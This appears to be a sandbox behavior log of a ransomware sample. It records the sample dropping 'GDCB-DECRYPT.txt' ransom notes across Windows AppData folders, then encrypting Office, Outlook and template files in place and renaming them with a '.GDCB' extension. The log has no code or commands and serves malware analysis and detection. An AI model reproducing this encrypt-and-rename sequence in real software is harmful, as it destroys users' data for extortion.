Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MMC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MMC\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\MS Project\16\en-US\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 1048576, size_out = 53 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 64 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Office\Recent\index.dat.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat, size = 1048576, size_out = 5184 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat, size = 5184 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 1048576, size_out = 2560 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 2560 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.srs.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 1048576, size_out = 2390 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 2400 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Outlook\Outlook.xml.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\PowerPoint\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\PowerPoint\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Proof\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Proof\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Protect\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Speech\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Speech\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm, size = 1048576, size_out = 914274 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm, size = 914288 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Calendar insights.xltm.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 1048576, size_out = 380006 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 380016 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm, size = 1048576, size_out = 738077 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm, size = 738080 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Email Insights.xltm.GDCB True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm, size = 1048576, size_out = 19043 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm, size = 19056 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Normal.dotm.GDCB True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx, size = 1048576, size_out = 109949 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Templates\Process Map for Basic Flowchart.xltx, size = 109952 True 1
Fn
Data
